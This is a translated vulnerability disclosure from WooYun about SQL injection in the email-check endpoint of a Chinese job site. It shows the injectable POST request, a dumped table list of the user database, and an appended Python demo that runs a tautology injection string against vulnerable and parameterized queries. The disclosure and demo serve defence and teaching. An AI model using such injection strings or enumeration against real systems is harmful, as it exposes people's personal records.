
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0148712

Title: SQL injection in 中国建筑人才网 (China Construction Talent Network) exposing the personal resumes of 400W+ (4 million+) members and a large amount of personal information

Affected vendor: 中国建筑人才网 (China Construction Talent Network)

Reporter: 路人甲

Submitted: 2015-10-23 09:42

Fix time: 2015-12-11 17:00

Published: 2015-12-11 17:00

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarked by 4


Vulnerability details

Disclosure status:

2015-10-23: Details sent to the vendor; awaiting vendor action
2015-10-27: Vendor confirmed; details visible to the vendor only
2015-11-06: Details opened to core white hats and relevant domain experts
2015-11-16: Details opened to regular white hats
2015-11-26: Details opened to intern white hats
2015-12-11: Details opened to the public

Brief description:

The site filters input parameters improperly, leading to SQL injection, and the database account runs with high privileges.

Detailed description:

Main site: http://**.**.**.**/
Vulnerable page: http://**.**.**.**/personal/reg/my_regone.jsp
The injection is in a POST request:

POST /personal/user_emailCheck.do HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://**.**.**.**/personal/reg/my_regone.jsp
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: **.**.**.**
Content-Length: 27
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=aaaACnKxgT9xY7Q2-6kcv
email=4859593@**.**.**.**&flag=2


The email parameter is injectable.

Proof of vulnerability:

(screenshot: 捕获.PNG)


Database: buildjob
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.DenyIP | 10127606 |
| dbo.pub_History | 4730420 |
| dbo.memberInviteResume | 4683996 |
| dbo.memberRecevResume | 4683996 |
| dbo.Position_VindicateLog | 3590121 |
| dbo.My_ResumeViewedLog | 2497338 |
| dbo.My_WorkExp | 1154051 |
| dbo.My_users | 1039178 |
| dbo.iResumeManage | 1032708 |
| dbo.My_Resume | 1032704 |
| dbo.My_Education | 949294 |
| dbo.resumeQuery | 771811 |
| dbo.Email_SendLog | 544938 |
| dbo.My_OutSendResumeLog | 367081 |
| dbo.Mem_Position | 245883 |
| dbo.dataAnalyse_VIEW | 217998 |
| dbo.My_Training | 176556 |
| dbo.Mem_History | 147536 |
| dbo.My_Favouriate | 100082 |
| dbo.Mem_account | 80677 |
| dbo.Mem_Rights | 80660 |
| dbo.Mem_Info | 80649 |
| dbo.memberRight | 80574 |
| dbo.memberRightAccount | 80561 |
| dbo.My_Searcher | 58771 |
| dbo.Mem_Resume_Classify | 51341 |
| dbo.Position | 49902 |
| dbo.JOB_LOGIN_DATA | 40015 |
| dbo.Mem_Address_Map | 39524 |
| dbo.Q_ANSWER_ALL | 39030 |
| dbo.My_Alijob | 34561 |
| dbo.LinkFluxLog | 32375 |
| dbo.My_Letter | 27372 |
| dbo.My_Certificate | 27338 |
| dbo.Company | 19072 |
| dbo.DisableIP | 16504 |
| dbo.LT_POST_INFO_ALL | 12704 |
| dbo.Admin_LogoInfo | 10775 |
| dbo.Q_ANSWER_ALL_new | 10378 |
| dbo.Mem_Searcher | 9147 |
| dbo.BrowseHistory | 7734 |
| dbo.Weibo_User_Login | 5972 |
| dbo.Mem_dept | 5964 |
| dbo.try_memid | 5719 |
| dbo.mem_pwd_info | 5187 |
| dbo.My_WorkExp2 | 4356 |
| dbo.My_Resume_eng | 4207 |
| dbo.memberRevertResume | 3817 |
| dbo.My_Education_Eng | 3051 |
| dbo.LT_MEMBER_INFO_ALL | 3011 |
| dbo.Mem_SpeedReg | 2972 |
| dbo.My_Education2 | 2387 |
| dbo.Zixun_Articles_Copy | 2213 |
| dbo.Weibo_Token | 2212 |
| dbo.My_Photo | 2051 |
| dbo.My_WorkExp_Eng | 1994 |
| dbo.Sch_Account | 1661 |
| dbo.weixin_oauth_user | 1545 |
| dbo.ZH_PERSON_INFO_ALL | 1410 |
| dbo.ForumUser | 1111 |
| dbo.SellOnSelfResume | 1020 |
| dbo.Address | 961 |
| dbo.My_Training_Eng | 864 |
| dbo.PASSWORD_RECOVERY | 689 |
| dbo.DeletePositionLog | 664 |
| dbo.Mem_ReplyModel | 632 |
| dbo.Sch_Info | 444 |
| dbo.My_Order | 437 |
| dbo.Msg_20118 | 419 |
| dbo.logoType | 346 |
| dbo.Q_QUESTION_ALL | 302 |
| dbo.LT_APPROVED_ALL | 290 |
| dbo.LT_USER_INFO_ALL | 285 |
| dbo.Q_QUESTION_ALL_new | 251 |
| dbo.Admin_HoldRight | 206 |
| dbo.Mem_GetOutLog | 184 |
| dbo.Msg_Templates | 167 |
| dbo.forumAttachment | 120 |
| dbo.industry | 108 |
| dbo.Resume_Order | 102 |
| dbo.Msg_20099 | 98 |
| dbo.Sch_Student | 93 |
| dbo.AdminMenu | 92 |
| dbo.wuerba_Dic_JobSort | 91 |
| dbo.My_Account | 84 |
| dbo.My_PayHistory | 50 |
| dbo.JobCalling | 46 |
| dbo.Mns_Recommended_Posts_Msg | 45 |
| dbo.Msg_Table | 39 |
| dbo.Admin_Keywords | 38 |
| dbo.Admin_Technic_Menu | 36 |
| dbo.ForumIntegral | 35 |
| dbo.Pub_IdCenter | 34 |
| dbo.PayPackage | 33 |
| dbo.ZH_COMPANY_INFO_ALL | 33 |
| dbo.Tourjob_Rights | 32 |
| dbo.Msg_20098 | 29 |
| dbo.Msg_PayHistory | 23 |
| dbo.PostsApply | 23 |
| dbo.ForumContent | 22 |
| dbo.LT_CATEGORY_ALL | 21 |
| dbo.Msg_201211 | 21 |
| dbo.Msg_20153 | 21 |
| dbo.Admin_Csc_Menu | 19 |
| dbo.Msg_Account | 18 |
| dbo.PosUpRed_Config | 18 |
| dbo.buildjob_Rights | 16 |
| dbo.Admin_Menu | 13 |
| dbo.Position_Order | 13 |
| dbo.ForumPosts | 12 |
| dbo.Tourjob_Users | 12 |
| dbo.admin_subcorpinfo | 10 |
| dbo.resume_blacklist | 10 |
| dbo.Zixun_Sort | 10 |
| dbo.Admin_Channel | 9 |
| dbo.Admin_ID | 9 |
| dbo.buildjob_Users | 9 |
| dbo.Msg_20105 | 9 |
| dbo.Admin_Model | 8 |
| dbo.Admin_Users | 8 |
| dbo.Admin_Dredge_Menu | 7 |
| dbo.Admin_Sell_Menu | 6 |
| dbo.ForumAttention | 6 |
| dbo.JOB_GROUP_CONFIG_ALL | 6 |
| dbo.Msg_20104 | 6 |
| dbo.Msg_20156 | 6 |
| dbo.Admin_Content_Menu | 5 |
| dbo.admin_corpinfo | 5 |
| dbo.corp_account | 5 |
| dbo.ForumCategory | 5 |
| dbo.Msg_20119 | 5 |
| dbo.Msg_History | 5 |
| dbo.Admin_CopyAdmin_Menu | 4 |
| dbo.JOB_GROUP_ROLE_ALL | 4 |
| dbo.Msg_20143 | 4 |
| dbo.Praise_Tread | 4 |
| dbo.ForumCollection | 3 |
| dbo.Msg_20094 | 3 |
| dbo.Msg_20115 | 3 |
| dbo.Msg_201212 | 3 |
| dbo.Msg_20128 | 3 |
| dbo.Msg_201411 | 3 |
| dbo.SystemMap_Search | 3 |
| dbo.JOB_GROUP_CONFIG_INDEX_ALL | 2 |
| dbo.JOB_GROUP_HISTORY_ALL | 2 |
| dbo.Msg_20107 | 2 |
| dbo.Msg_20129 | 2 |
| dbo.SystemMap | 2 |
| dbo.Admin_dicVersion | 1 |
| dbo.Admin_Spread_Menu | 1 |
| dbo.Msg_20093 | 1 |
| dbo.Msg_20095 | 1 |
| dbo.Msg_20097 | 1 |
| dbo.Msg_20109 | 1 |
| dbo.Msg_201412 | 1 |
| dbo.Msg_20147 | 1 |
+--------------------------------+---------+


(screenshot: 捕获1.PNG)

(screenshot: 捕获2.PNG)

This shows that 460W+ (4.6 million+) personal resumes are exposed.
They include WeChat and Weibo account details, which could be used for social engineering.
Many database instances are exposed, covering a large amount of information:

(screenshot: 捕获3.PNG)

Leaked personnel records:

(screenshot: 档案数据.PNG)

Fix recommendation:

Filter the input.
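As an added illustration that is not part of the original report, the following Python snippet contrasts the pattern behind this finding (a POST `email` parameter spliced into the SQL text) with the parameterized query plus input validation that the one-word remediation above implies. The real application is JSP in front of Microsoft SQL Server (the `dbo.` prefix in the listing above); this example uses SQLite from the Python standard library so it runs offline. The table name `My_users` is borrowed from the listing, while its columns, the sample rows, the e-mail regex and the `email_check_handler` function are constructed assumptions for the demonstration.

```python
import re
import sqlite3

# Constructed sample data. The table name My_users comes from the report's
# table listing; the columns and rows are invented for this demonstration.
SAMPLE_USERS = [
    ("alice@example.com", "Alice"),
    ("bob@example.com", "Bob"),
]

# Loose syntactic check for an e-mail address (an assumption, not the site's rule).
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def build_db():
    """Create an in-memory SQLite database standing in for the site's MSSQL instance."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE My_users (id INTEGER PRIMARY KEY, email TEXT NOT NULL, name TEXT)"
    )
    conn.executemany("INSERT INTO My_users (email, name) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def email_exists_vulnerable(conn, email):
    """The defect the report describes: the request parameter becomes part of the SQL text.

    A value containing a quote rewrites the WHERE clause instead of being compared to it,
    so the caller controls what the query does rather than only what it matches.
    """
    sql = "SELECT COUNT(*) FROM My_users WHERE email = '" + email + "'"
    return conn.execute(sql).fetchone()[0] > 0


def email_exists_parameterized(conn, email):
    """Hardened lookup: the value travels as a bound parameter, never as SQL text."""
    row = conn.execute(
        "SELECT COUNT(*) FROM My_users WHERE email = ?", (email,)
    ).fetchone()
    return row[0] > 0


def email_check_handler(conn, email):
    """Model of the user_emailCheck endpoint: validate the shape first, then query safely.

    Returns a small dict in place of an HTTP response.
    """
    if email is None or not EMAIL_RE.fullmatch(email):
        return {"status": 400, "error": "invalid email"}
    return {"status": 200, "exists": email_exists_parameterized(conn, email)}


if __name__ == "__main__":
    conn = build_db()
    tautology = "' OR '1'='1"  # textbook boolean injection string, used only to show the contrast
    print("vulnerable, normal input:", email_exists_vulnerable(conn, "alice@example.com"))
    print("vulnerable, tautology   :", email_exists_vulnerable(conn, tautology))
    print("parameterized, tautology:", email_exists_parameterized(conn, tautology))
    print("handler, tautology      :", email_check_handler(conn, tautology))
    print("handler, normal input   :", email_check_handler(conn, "bob@example.com"))
```

With the concatenated query the tautology input reports that the address "exists" because the WHERE clause has been rewritten; with the bound parameter the same string is compared literally against the column and matches nothing, and the handler rejects it before any query runs. Because the report also notes that the database account runs with high privileges, the application's connection should additionally use an account limited to the tables this endpoint needs, so that an injection that does slip through cannot enumerate the whole instance as the listing above shows.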

Copyright notice: when reproducing, credit the source as 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2015-10-27 17:00

Vendor reply:

CNVD confirmed and reproduced the described issue and has notified the site operator by e-mail through its publicly listed contact channel; the operator will provide a remediation plan.

Latest status:

None